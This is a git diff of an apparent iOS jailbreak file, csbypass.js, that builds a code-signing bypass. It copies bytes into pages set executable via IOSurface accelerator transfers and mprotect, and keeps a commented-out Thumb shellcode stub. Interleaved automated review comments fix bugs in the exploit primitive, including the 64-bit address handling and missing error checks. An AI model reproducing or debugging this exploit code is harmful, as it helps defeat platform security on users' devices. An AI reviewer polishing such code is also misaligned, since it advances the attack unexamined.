-rw-r--r--src/js/csbypass.js47
1 files changed, 44 insertions, 3 deletions
diff --git a/src/js/csbypass.js b/src/js/csbypass.js
index b46880a..f987e55 100644
--- a/src/js/csbypass.js
+++ b/src/js/csbypass.js
@@ -7,6 +7,7 @@ var kCFTypeDictionaryValueCallBacks_addr = 0x343c79fc;
var CFDictionarySetValue_addr = 0x2080a791;
var CFNumberCreate_addr = 0x2080bc79;
var kCFNumberSInt32Type = 3;
+var kCFNumberSInt64Type = 4;
var CFShow_addr = 0x208e897c | 1;
var my_kIOSurfaceBytesPerRow;
@@ -15,6 +16,8 @@ var my_kIOSurfaceHeight;
var my_kIOSurfacePixelFormat;
var kCFAllocatorDefault;
+var kCFStringEncodingUTF8 = 0x08000100;
+
function csbypass() {
printf("hello from csbypass!\n");
poc();
@@ -41,7 +44,41 @@ function memcpy_exec(dst, src, size) {
CFDictionarySetValue(dict, read_u32(my_kIOSurfaceHeight), CFNumberCreate(read_u32(kCFAllocatorDefault), kCFNumberSInt32Type, height));
CFDictionarySetValue(dict, read_u32(my_kIOSurfacePixelFormat), CFNumberCreate(read_u32(kCFAllocatorDefault), kCFNumberSInt32Type, pixel_format));
printf("%d\n", callnarg(my_IOSurfaceAcceleratorCreate, 0, 0, accel));
- printf ("you can kill me now\n");
+ printf("you can kill me now\n");
+
+ printf("yahtzee1\n");
+
+ for (var i = 0; i < size; i += PAGE_SIZE) {
+ var kr = 0;
+ var target = shit_heap(4);
+ var srcaddr = shit_heap(4);
+ printf("yahtzee1\n");
+ write_u32(target, dst + i);
+ write_u32(srcaddr, src);
+ printf("yahtzee1 %x %x\n", dst, src);
+
+ printf("%x\n", CFStringCreateWithCString(read_u32(kCFAllocatorDefault), "IOSurfaceAddress", kCFStringEncodingUTF8));
+
+ CFDictionarySetValue(dict, CFStringCreateWithCString(read_u32(kCFAllocatorDefault), "IOSurfaceAddress", kCFStringEncodingUTF8), CFNumberCreate(read_u32(kCFAllocatorDefault), kCFNumberSInt64Type, srcaddr));
+ printf("yahtzee1\n");
+ var src_surf = callnarg(my_IOSurfaceCreate, dict);
+ printf("yahtzee1\n");
+ mprotect(target, PAGE_SIZE, PROT_READ | PROT_WRITE);
+ printf("yahtzee1\n");
+ CFDictionarySetValue(dict, CFStringCreateWithCString(read_u32(kCFAllocatorDefault), "IOSurfaceAddress", kCFStringEncodingUTF8), CFNumberCreate(read_u32(kCFAllocatorDefault), kCFNumberSInt64Type, target));
+ printf("yahtzee1\n");
+ var dest_surf = callnarg(my_IOSurfaceCreate, dict);
+ printf("yahtzee1\n");
+ mprotect(target, PAGE_SIZE, PROT_READ | PROT_EXEC);
+ printf("yahtzee1\n");
+ mlock(target, PAGE_SIZE);
+ printf("yahtzee1\n");
+ kr = callnarg(my_IOSurfaceAcceleratorTransferSurface, accel, src_surf, dest_surf, 0, 0);
+ printf("kr2=0x%08x\n", kr);
+ printf("yahtzee1\n");
+}
+
+ return dst;
}
function linkIOSurface() {
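Review bot: The two cells passed to `CFNumberCreate(..., kCFNumberSInt64Type, ...)` are obtained with `shit_heap(4)` and filled with a single `write_u32`, but an SInt64 CFNumber reads 8 bytes from the value pointer, so (assuming `shit_heap(n)` hands back an n-byte cell) the high word of `IOSurfaceAddress` is whatever the allocator left there rather than 0. In the same loop `write_u32(srcaddr, src)` never advances with `i` while `target` does, so any `size` larger than `PAGE_SIZE` re-copies the first source page into every destination page; the current caller passes 0x1000 so only the first page is exercised today. Neither `IOSurfaceCreate` result nor `kr` from `IOSurfaceAcceleratorTransferSurface` is checked before the function returns `dst` as if the copy succeeded, and the CFString/CFNumber/IOSurface objects created per iteration are never released. `memcpy_exec`'s signature and the start of its body lie outside this hunk.
```javascript
for (var i = 0; i < size; i += PAGE_SIZE) {
    // CFNumberCreate with kCFNumberSInt64Type reads 8 bytes at the value pointer:
    // allocate 8 and zero the high word so the address is not polluted by heap garbage
    var target = shit_heap(8);
    var srcaddr = shit_heap(8);
    write_u32(target, dst + i);
    write_u32(target + 4, 0);
    write_u32(srcaddr, src + i);
    write_u32(srcaddr + 4, 0);
    // … unchanged: IOSurfaceAddress property setup, IOSurfaceCreate, mprotect/mlock …
    kr = callnarg(my_IOSurfaceAcceleratorTransferSurface, accel, src_surf, dest_surf, 0, 0);
    if (kr != 0) {
        printf("TransferSurface failed kr=0x%08x at page 0x%x\n", kr, i);
        return 0; // signal failure instead of handing back dst as if the copy landed
    }
}
```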
@@ -68,7 +105,8 @@ function poc() {
linkIOSurface();
var tmp = malloc(0x4000);
- var start = [0x4F, 0xF0, 0x82, 0x40, 0x00, 0x47];
+// var start = [0x4F, 0xF0, 0x82, 0x40, 0x00, 0x47];
+ var start = [0x44, 0x43, 0x42, 0x41];
for (var i = 0; i < start.length; i++) {
write_u8(tmp + i, start[i]);
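Review bot: The previous shellcode stub is left behind as a commented-out line above the new `start` array with no explanation of why it was swapped for marker bytes; a reader cannot tell whether the Thumb bytes are meant to come back or the marker is the new intent. Either drop the commented-out line or replace it with a comment stating the purpose, e.g. `// marker bytes: after memcpy_exec, read_u32(0x10000) should show 0x41424344 (little-endian "DCBA") if the copy landed`. Only `start.length` bytes of the 0x4000-byte `tmp` buffer are initialised here, so the remainder of the 0x1000 bytes that `memcpy_exec` later copies is uninitialised `malloc` content — presumably acceptable for a marker test, but worth a comment.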
@@ -76,7 +114,10 @@ function poc() {
var finish = 0x10000;
- memcpy_exec(finish. tmp, 0x1000);
+ printf("%x\n", read_u32(0x10000));
+ printf("yahtzee\n");
+ memcpy_exec(finish, tmp, 0x1000);
+ printf("%x\n", read_u32(0x10000));
scall("printf", "%x %x %x %x %x %x %x %x %x %x %x %x %x\n", h, my_kIOSurfaceBytesPerRow, my_kIOSurfaceWidth, my_kIOSurfaceHeight, my_kIOSurfacePixelFormat, my_IOSurfaceAcceleratorCreate, my_IOSurfaceCreate, my_IOSurfaceAcceleratorTransferSurface, 0x41414141);